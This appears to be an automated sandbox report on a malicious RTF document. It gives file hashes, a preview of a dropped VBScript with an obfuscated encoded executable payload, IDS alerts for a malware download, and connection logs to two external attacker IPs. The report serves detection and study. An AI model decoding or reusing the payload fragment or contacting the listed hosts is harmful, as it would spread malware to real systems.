                                              File Type:ASCII text, with very long lines (65399), with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):92431
                                              Entropy (8bit):4.8789339351328405
                                              Encrypted:false
                                              SSDEEP:1536:35VT1rG9XgL21xU47L2HiUYxd9jd4Qyxsyf4SgfAw2zXdcp2bF+Z:JPG9pxh7L2SxKsu4SU0u2bI
                                              MD5:7834CBAFCFAD72B1BDA091F3CCE8E997
                                              SHA1:034AFCB22B254090084269FC8BCD68F64E4A85A8
                                              SHA-256:AAC62555CF55C081E503636CF2D696AB33A789B9D10DDC8A9EF2ED8014890913
                                              SHA-512:FA08EF7847F8F98A6E2442DB45935FBAA30D0C0CD26ABF457F8579FFDACE28D7851D5BBDC7630406C5FCFE74381241ACCD74B72E4DD79E194E1FD481BC06CFFF
                                              Malicious:true
                                              Preview:' Main script logic for processing Base64-encoded data....' Initialize the Base64 encoded string (placeholder)..Dim encodedBase64String..encodedBase64String = "));;;qQ@@@@M@@@@@@@@E@@@@@@@@//8@@@@Lg@@@@@@@@@@@@@@@@@@Q@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@g@@@@@@@@@@4fug4@@t@@nNIbg...))M0h;;;Ghpcy...wcm9ncmFtIGNhbm5vdC...iZS...ydW4gaW4gRE9))IG1vZGUuDQ0K&&&@@@@@@@@@@@@@@@@@@...QRQ@@@@))@@ED@@Fvx9GY@@@@@@@@@@@@@@@@@@@@O@@@@DgEL@@))@@@@@@I@@@@@@@@C8@@@@@@@@@@@@@@@@Ep4@@@@@@@@g@@@@@@@@o@@@@@@@@@@...@@@@@@@@g@@@@@@@@@@g@@@@...@@@@@@@@@@@@@@@@@@@@E@@@@@@@@@@@@@@@@@@@@@@@@@@Q@@@@@@g@@@@@@@@@@@@@@@@I@@YIU@@@@...@@@@@@...@@@@@@@@@@@@E@@@@@@E@@@@@@@@@@@@@@@@...@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@Lid@@@@...X@@@@@@@@@@M@@@@@@@@Q7@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@K@@@@@@@@w@@@@@@CwSQ@@@@H@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@I@@@@@@C@@@@@@@@@@@@@@@@@@@@@@@
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):162
                                              Entropy (8bit):2.5038355507075254
                                              Encrypted:false
                                              SSDEEP:3:vrJlaCkWtVyyAGlY5mWSyePAi/lln:vdsCkWtA9/idl
                                              MD5:782B772E21E6B8EFB11B235130F050A6
                                              SHA1:D841FB557392C38D7B7F5EF52F03D6FA77DAD0EC
                                              SHA-256:F69766E15E5E7AFF3E540B8B098B618172F5350CBDFA757D4CFD9071A5DA37E8
                                              SHA-512:DAB38260CE9D0C9C11478D982B6672058BF07CCD28DB4CB36F8112252BEE9D34EA55F07364BCF2883A8CB211AA7701D877B7827CF0EB7BC8E19DA7249C456849
                                              Malicious:false
                                              Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                              File type:Rich Text Format data, version 1
                                              Entropy (8bit):2.8471901685936154
                                              TrID:
                                              • Rich Text Format (5005/1) 55.56%
                                              • Rich Text Format (4004/1) 44.44%
                                              File name:eMJ2QgQF4u.rtf
                                              File size:108'966 bytes
                                              MD5:d805f910e1756735e34523281088f2ed
                                              SHA1:243f7b70a0fde02f3afd3b7d2fe99a786cb505db
                                              SHA256:d43cc5a3d193c33295a70f6861ee2d0ddbeeb165ab106018f06a38cc5297eb57
                                              SHA512:37c6edc231148af4c65c77412f7672d12ec8504b3fb35bf6581e7a3405242a21d302af97c6b898312750d8938d8c4b83299dc746a284f5f90e2b8e5b7cba807f
                                              SSDEEP:768:DdO5Q5s3pz7p3S2b9dbk4bSI+GdepBlMNIbnq8dEK7wC5Sbcif4:DwaGj9BjjdepBCNIbnfEGMbn4
                                              TLSH:82B3CDA9C78F01A5CF64A73B03679A0945F8B33EF21458A530AC977133EDD2E596187C
                                              File Content Preview:{\rtf1..{\*\9tK3ug6SfiJBlo39Vt3WS6ar2vcROpN1MywcyDGhqQLa9xg1cP1BtfFg5Bc5eSCSPmbIvLuh2OtfipPq9uEL2LruDTpJQo4ySrisQ4yiN7MD7R9sFx}..{\44620688%=-)~61./$?$9;)?2.=&_-&~?@,+,^)'.~4&|?#6??~1;!=.+`@'1>!?7)?[5.?%|%.,28_^.*.4._?_1+0&%1%).$.~[[>&`??80'.*!.(-.|?~.?>`
                                              Icon Hash:2764a3aaaeb7bdbf
                                              IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                              000001FBEhno
Timestamp                        SID      Signature                                                                             Severity  Source IP     Source Port  Dest IP        Dest Port  Protocol
2024-09-27T10:57:07.632401+0200  2019696  ET MALWARE Possible MalDoc Payload Download Nov 11 2014                               1         192.168.2.22  49166        185.18.213.20  443        TCP
2024-09-27T10:57:07.632401+0200  2019714  ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile  2         192.168.2.22  49166        185.18.213.20  443        TCP
2024-09-27T10:57:09.645046+0200  2803305  ETPRO MALWARE Common Downloader Header Pattern H                                      3         192.168.2.22  49167        185.18.213.20  443        TCP
Timestamp                             Source Port  Dest Port  Source IP        Dest IP
Sep 27, 2024 10:57:02.180000067 CEST  49165        80         192.168.2.22     185.235.137.223
Sep 27, 2024 10:57:02.184861898 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:02.184930086 CEST  49165        80         192.168.2.22     185.235.137.223
Sep 27, 2024 10:57:02.185199976 CEST  49165        80         192.168.2.22     185.235.137.223
Sep 27, 2024 10:57:02.189933062 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:02.803174019 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:02.803193092 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:02.803203106 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:02.803212881 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:02.803224087 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:02.803234100 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:02.803244114 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:02.803250074 CEST  49165        80         192.168.2.22     185.235.137.223
Sep 27, 2024 10:57:02.803253889 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:02.803271055 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:02.803282976 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:02.803289890 CEST  49165        80         192.168.2.22     185.235.137.223
Sep 27, 2024 10:57:02.803289890 CEST  49165        80         192.168.2.22     185.235.137.223
Sep 27, 2024 10:57:02.803309917 CEST  49165        80         192.168.2.22     185.235.137.223
Sep 27, 2024 10:57:02.803323984 CEST  49165        80         192.168.2.22     185.235.137.223
Sep 27, 2024 10:57:02.808748960 CEST  49165        80         192.168.2.22     185.235.137.223
Sep 27, 2024 10:57:02.809614897 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:02.809674978 CEST  49165        80         192.168.2.22     185.235.137.223
Sep 27, 2024 10:57:02.809778929 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:02.809818983 CEST  49165        80         192.168.2.22     185.235.137.223
Sep 27, 2024 10:57:02.890192032 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:02.890212059 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:02.890224934 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:02.890235901 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:02.890288115 CEST  49165        80         192.168.2.22     185.235.137.223
Sep 27, 2024 10:57:02.890289068 CEST  49165        80         192.168.2.22     185.235.137.223
Sep 27, 2024 10:57:02.890335083 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:02.890347004 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:02.890360117 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:02.890396118 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:02.890398026 CEST  49165        80         192.168.2.22     185.235.137.223
Sep 27, 2024 10:57:02.890398026 CEST  49165        80         192.168.2.22     185.235.137.223
Sep 27, 2024 10:57:02.890408993 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:02.890436888 CEST  49165        80         192.168.2.22     185.235.137.223
Sep 27, 2024 10:57:02.891119003 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:02.891138077 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:02.891149044 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:02.891180038 CEST  49165        80         192.168.2.22     185.235.137.223
Sep 27, 2024 10:57:02.891202927 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:02.891202927 CEST  49165        80         192.168.2.22     185.235.137.223
Sep 27, 2024 10:57:02.891216040 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:02.891261101 CEST  49165        80         192.168.2.22     185.235.137.223
Sep 27, 2024 10:57:02.892038107 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:02.892050028 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:02.892061949 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:02.892097950 CEST  49165        80         192.168.2.22     185.235.137.223
Sep 27, 2024 10:57:02.892103910 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:02.892117977 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:02.892118931 CEST  49165        80         192.168.2.22     185.235.137.223
Sep 27, 2024 10:57:02.892160892 CEST  49165        80         192.168.2.22     185.235.137.223
Sep 27, 2024 10:57:02.892906904 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:02.892920017 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:02.892930984 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:02.892967939 CEST  49165        80         192.168.2.22     185.235.137.223
Sep 27, 2024 10:57:02.893019915 CEST  49165        80         192.168.2.22     185.235.137.223
Sep 27, 2024 10:57:02.974231958 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:02.974267960 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:02.974278927 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:02.974288940 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:02.974292040 CEST  49165        80         192.168.2.22     185.235.137.223
Sep 27, 2024 10:57:02.974330902 CEST  49165        80         192.168.2.22     185.235.137.223
Sep 27, 2024 10:57:02.974340916 CEST  49165        80         192.168.2.22     185.235.137.223
Sep 27, 2024 10:57:02.977443933 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:02.977463007 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:02.977472067 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:02.977488995 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:02.977499008 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:02.977507114 CEST  49165        80         192.168.2.22     185.235.137.223
Sep 27, 2024 10:57:02.977520943 CEST  49165        80         192.168.2.22     185.235.137.223
Sep 27, 2024 10:57:02.977525949 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:02.977531910 CEST  49165        80         192.168.2.22     185.235.137.223
Sep 27, 2024 10:57:02.977782011 CEST  49165        80         192.168.2.22     185.235.137.223
Sep 27, 2024 10:57:02.977978945 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:02.977991104 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:02.978001118 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:02.978018999 CEST  49165        80         192.168.2.22     185.235.137.223
Sep 27, 2024 10:57:02.978030920 CEST  49165        80         192.168.2.22     185.235.137.223
Sep 27, 2024 10:57:02.978055954 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:02.978068113 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:02.978089094 CEST  49165        80         192.168.2.22     185.235.137.223
Sep 27, 2024 10:57:02.978099108 CEST  49165        80         192.168.2.22     185.235.137.223
Sep 27, 2024 10:57:02.978607893 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:02.978619099 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:02.978631020 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:02.978650093 CEST  49165        80         192.168.2.22     185.235.137.223
Sep 27, 2024 10:57:02.978669882 CEST  49165        80         192.168.2.22     185.235.137.223
Sep 27, 2024 10:57:02.978672981 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:02.978683949 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:02.978694916 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:02.978702068 CEST  49165        80         192.168.2.22     185.235.137.223
Sep 27, 2024 10:57:02.978705883 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:02.978719950 CEST  49165        80         192.168.2.22     185.235.137.223
Sep 27, 2024 10:57:02.978734016 CEST  49165        80         192.168.2.22     185.235.137.223
Sep 27, 2024 10:57:02.979541063 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:02.979551077 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:02.979561090 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:02.979583979 CEST  49165        80         192.168.2.22     185.235.137.223
Sep 27, 2024 10:57:02.979598045 CEST  49165        80         192.168.2.22     185.235.137.223
Sep 27, 2024 10:57:02.979613066 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:02.979624033 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:02.979633093 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:02.979641914 CEST  49165        80         192.168.2.22     185.235.137.223
Sep 27, 2024 10:57:02.979645014 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:02.979660034 CEST  49165        80         192.168.2.22     185.235.137.223
Sep 27, 2024 10:57:02.979675055 CEST  49165        80         192.168.2.22     185.235.137.223
Sep 27, 2024 10:57:02.980432987 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:02.980444908 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:02.980454922 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:02.980477095 CEST  49165        80         192.168.2.22     185.235.137.223
Sep 27, 2024 10:57:02.980488062 CEST  49165        80         192.168.2.22     185.235.137.223
Sep 27, 2024 10:57:02.980515957 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:02.980525970 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:02.980535984 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:02.980546951 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:02.980551004 CEST  49165        80         192.168.2.22     185.235.137.223
Sep 27, 2024 10:57:02.980562925 CEST  49165        80         192.168.2.22     185.235.137.223
Sep 27, 2024 10:57:02.980577946 CEST  49165        80         192.168.2.22     185.235.137.223
Sep 27, 2024 10:57:02.981384993 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:02.981429100 CEST  49165        80         192.168.2.22     185.235.137.223
Sep 27, 2024 10:57:03.060085058 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:03.060112953 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:03.060126066 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:03.060137033 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:03.060148954 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:03.060161114 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:03.060163021 CEST  49165        80         192.168.2.22     185.235.137.223
Sep 27, 2024 10:57:03.060205936 CEST  49165        80         192.168.2.22     185.235.137.223
Sep 27, 2024 10:57:03.060205936 CEST  49165        80         192.168.2.22     185.235.137.223
Sep 27, 2024 10:57:03.060216904 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:03.060229063 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:03.060240030 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:03.060251951 CEST  80           49165      185.235.137.223  192.168.2.22
Sep 27, 2024 10:57:03.060261011 CEST  49165        80         192.168.2.22     185.235.137.223
Sep 27, 2024 10:57:03.060275078 CEST  49165        80         192.168.2.22     185.235.137.223
Sep 27, 2024 10:57:03.060290098 CEST  49165        80         192.168.2.22     185.235.137.223
Sep 27, 2024 10:57:03.584847927 CEST  49165        80         192.168.2.22     185.235.137.223
Sep 27, 2024 10:57:05.859360933 CEST  49166        443        192.168.2.22     185.18.213.20
Sep 27, 2024 10:57:05.859419107 CEST  443          49166      185.18.213.20    192.168.2.22
Sep 27, 2024 10:57:05.859504938 CEST  49166        443        192.168.2.22     185.18.213.20
Sep 27, 2024 10:57:05.865971088 CEST  49166        443        192.168.2.22     185.18.213.20
Sep 27, 2024 10:57:05.865994930 CEST  443          49166      185.18.213.20    192.168.2.22
Sep 27, 2024 10:57:06.673691988 CEST  443          49166      185.18.213.20    192.168.2.22
Sep 27, 2024 10:57:06.673825979 CEST  49166        443        192.168.2.22     185.18.213.20
Sep 27, 2024 10:57:06.706881046 CEST  49166        443        192.168.2.22     185.18.213.20
Sep 27, 2024 10:57:06.706907988 CEST  443          49166      185.18.213.20    192.168.2.22
Sep 27, 2024 10:57:06.707344055 CEST  443          49166      185.18.213.20    192.168.2.22
Sep 27, 2024 10:57:06.911413908 CEST  443          49166      185.18.213.20    192.168.2.22
Sep 27, 2024 10:57:06.911509991 CEST  49166        443        192.168.2.22     185.18.213.20
Sep 27, 2024 10:57:07.314166069 CEST  49166        443        192.168.2.22     185.18.213.20
Sep 27, 2024 10:57:07.359417915 CEST  443          49166      185.18.213.20    192.168.2.22
Sep 27, 2024 10:57:07.632471085 CEST  443          49166      185.18.213.20    192.168.2.22
Sep 27, 2024 10:57:07.749442101 CEST  443          49166      185.18.213.20    192.168.2.22
Sep 27, 2024 10:57:07.749494076 CEST  443          49166      185.18.213.20    192.168.2.22
Sep 27, 2024 10:57:07.749593973 CEST  49166        443        192.168.2.22     185.18.213.20
Sep 27, 2024 10:57:07.749634981 CEST  443          49166      185.18.213.20    192.168.2.22
Sep 27, 2024 10:57:07.749646902 CEST  443          49166      185.18.213.20    192.168.2.22
Sep 27, 2024 10:57:07.749682903 CEST  49166        443        192.168.2.22     185.18.213.20
Sep 27, 2024 10:57:07.751624107 CEST  443          49166      185.18.213.20    192.168.2.22
Sep 27, 2024 10:57:07.751631021 CEST  443          49166      185.18.213.20    192.168.2.22
Sep 27, 2024 10:57:07.751672029 CEST  49166        443        192.168.2.22     185.18.213.20
Sep 27, 2024 10:57:07.751677036 CEST  443          49166      185.18.213.20    192.168.2.22
Sep 27, 2024 10:57:07.751683950 CEST  443          49166      185.18.213.20    192.168.2.22
Sep 27, 2024 10:57:07.751699924 CEST  443          49166      185.18.213.20    192.168.2.22
Sep 27, 2024 10:57:07.751724005 CEST  49166        443        192.168.2.22     185.18.213.20
Sep 27, 2024 10:57:07.789282084 CEST  49166        443        192.168.2.22     185.18.213.20
Sep 27, 2024 10:57:07.919734955 CEST  443          49166      185.18.213.20    192.168.2.22
Sep 27, 2024 10:57:07.919748068 CEST  443          49166      185.18.213.20    192.168.2.22
Sep 27, 2024 10:57:07.919807911 CEST  443          49166      185.18.213.20    192.168.2.22
Sep 27, 2024 10:57:07.919815063 CEST  443          49166      185.18.213.20    192.168.2.22
Sep 27, 2024 10:57:07.919879913 CEST  49166        443        192.168.2.22     185.18.213.20
Sep 27, 2024 10:57:07.919907093 CEST  443          49166      185.18.213.20    192.168.2.22
Sep 27, 2024 10:57:07.919935942 CEST  49166        443        192.168.2.22     185.18.213.20
Sep 27, 2024 10:57:07.920615911 CEST  443          49166      185.18.213.20    192.168.2.22
Sep 27, 2024 10:57:07.920625925 CEST  443          49166      185.18.213.20    192.168.2.22
Sep 27, 2024 10:57:07.920661926 CEST  49166        443        192.168.2.22     185.18.213.20
Sep 27, 2024 10:57:07.920674086 CEST  443          49166      185.18.213.20    192.168.2.22
Sep 27, 2024 10:57:07.920694113 CEST  443          49166      185.18.213.20    192.168.2.22
Sep 27, 2024 10:57:07.920702934 CEST  49166        443        192.168.2.22     185.18.213.20
Sep 27, 2024 10:57:07.920706987 CEST  443          49166      185.18.213.20    192.168.2.22
Sep 27, 2024 10:57:07.920773029 CEST  49166        443        192.168.2.22     185.18.213.20
Sep 27, 2024 10:57:07.921375036 CEST  443          49166      185.18.213.20    192.168.2.22
Sep 27, 2024 10:57:07.921421051 CEST  443          49166      185.18.213.20    192.168.2.22
Sep 27, 2024 10:57:07.921452045 CEST  49166        443        192.168.2.22     185.18.213.20
Sep 27, 2024 10:57:07.921458960 CEST  443          49166      185.18.213.20    192.168.2.22
Sep 27, 2024 10:57:07.921483040 CEST  49166        443        192.168.2.22     185.18.213.20
Sep 27, 2024 10:57:07.924225092 CEST  443          49166      185.18.213.20    192.168.2.22
Sep 27, 2024 10:57:07.924268961 CEST  49166        443        192.168.2.22     185.18.213.20
Sep 27, 2024 10:57:07.924277067 CEST  443          49166      185.18.213.20    192.168.2.22
Sep 27, 2024 10:57:07.924287081 CEST  443          49166      185.18.213.20    192.168.2.22
Sep 27, 2024 10:57:07.924316883 CEST  49166        443        192.168.2.22     185.18.213.20
Sep 27, 2024 10:57:07.949064016 CEST  49166        443        192.168.2.22     185.18.213.20
Sep 27, 2024 10:57:08.090574980 CEST  443          49166      185.18.213.20    192.168.2.22
Sep 27, 2024 10:57:08.090626955 CEST  443          49166      185.18.213.20    192.168.2.22
Sep 27, 2024 10:57:08.090729952 CEST  49166        443        192.168.2.22     185.18.213.20
Sep 27, 2024 10:57:08.090758085 CEST  443          49166      185.18.213.20    192.168.2.22
Sep 27, 2024 10:57:08.090790033 CEST  49166        443        192.168.2.22     185.18.213.20
Sep 27, 2024 10:57:08.090908051 CEST  443          49166      185.18.213.20    192.168.2.22
Sep 27, 2024 10:57:08.090945005 CEST  49166        443        192.168.2.22     185.18.213.20
Sep 27, 2024 10:57:08.090954065 CEST  443          49166      185.18.213.20    192.168.2.22
Sep 27, 2024 10:57:08.090964079 CEST  443          49166      185.18.213.20    192.168.2.22
Sep 27, 2024 10:57:08.090993881 CEST  49166        443        192.168.2.22     185.18.213.20
Sep 27, 2024 10:57:08.091861010 CEST  443          49166      185.18.213.20    192.168.2.22
Sep 27, 2024 10:57:08.091903925 CEST  443          49166      185.18.213.20    192.168.2.22
Sep 27, 2024 10:57:08.091907024 CEST  49166        443        192.168.2.22     185.18.213.20
Sep 27, 2024 10:57:08.091926098 CEST  443          49166      185.18.213.20    192.168.2.22
Sep 27, 2024 10:57:08.091939926 CEST  49166        443        192.168.2.22     185.18.213.20
Sep 27, 2024 10:57:08.095237017 CEST  443          49166      185.18.213.20    192.168.2.22
Sep 27, 2024 10:57:08.095285892 CEST  443          49166      185.18.213.20    192.168.2.22
Sep 27, 2024 10:57:08.095290899 CEST  49166        443        192.168.2.22     185.18.213.20
Sep 27, 2024 10:57:08.095314026 CEST  443          49166      185.18.213.20    192.168.2.22
Sep 27, 2024 10:57:08.095329046 CEST  49166        443        192.168.2.22     185.18.213.20
Sep 27, 2024 10:57:08.095603943 CEST  443          49166      185.18.213.20    192.168.2.22
Sep 27, 2024 10:57:08.095648050 CEST  49166        443        192.168.2.22     185.18.213.20
Sep 27, 2024 10:57:08.101526022 CEST  49166        443        192.168.2.22     185.18.213.20
Sep 27, 2024 10:57:08.101548910 CEST  443          49166      185.18.213.20    192.168.2.22
Sep 27, 2024 10:57:08.101562977 CEST  443          49166      185.18.213.20    192.168.2.22
Sep 27, 2024 10:57:08.101644039 CEST  49166        443        192.168.2.22     185.18.213.20
Sep 27, 2024 10:57:08.102834940 CEST  49166        443        192.168.2.22     185.18.213.20
Sep 27, 2024 10:57:08.178327084 CEST  443          49166      185.18.213.20    192.168.2.22
Sep 27, 2024 10:57:08.178385973 CEST  443          49166      185.18.213.20    192.168.2.22
Sep 27, 2024 10:57:08.178442001 CEST  49166        443        192.168.2.22     185.18.213.20
Sep 27, 2024 10:57:08.178442001 CEST  49166        443        192.168.2.22     185.18.213.20
Sep 27, 2024 10:57:08.178468943 CEST  443          49166      185.18.213.20    192.168.2.22
Sep 27, 2024 10:57:08.200781107 CEST  49166        443        192.168.2.22     185.18.213.20
                                              Sep 27, 2024 10:57:08.260687113 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:08.260756969 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:08.260834932 CEST49166443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:08.260867119 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:08.260895014 CEST49166443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:08.261339903 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:08.261388063 CEST49166443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:08.261394024 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:08.261406898 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:08.261441946 CEST49166443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:08.261719942 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:08.261765957 CEST49166443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:08.261766911 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:08.261775970 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:08.261810064 CEST49166443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:08.262058020 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:08.262104034 CEST49166443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:08.262104988 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:08.262113094 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:08.262147903 CEST49166443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:08.262254953 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:08.262299061 CEST49166443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:08.262303114 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:08.262331009 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:08.262366056 CEST49166443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:08.264333010 CEST49166443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:08.354645967 CEST49166443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:08.358833075 CEST49167443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:08.358886003 CEST44349167185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:08.358946085 CEST49167443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:08.360899925 CEST49167443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:08.360924959 CEST44349167185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:09.167964935 CEST44349167185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:09.177370071 CEST49167443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:09.177413940 CEST44349167185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:09.645096064 CEST44349167185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:09.818219900 CEST44349167185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:09.818236113 CEST44349167185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:09.818341970 CEST49167443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:09.818375111 CEST44349167185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:09.818387032 CEST44349167185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:09.818432093 CEST44349167185.18.213.20192.168.2.22
